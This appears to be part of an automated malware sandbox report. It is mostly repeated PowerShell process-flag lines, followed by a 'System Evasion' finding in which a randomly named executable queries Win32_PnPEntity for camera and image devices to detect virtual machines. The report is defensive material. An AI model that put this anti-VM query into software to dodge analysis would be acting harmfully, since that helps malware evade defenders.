                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    barindex
                                    Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
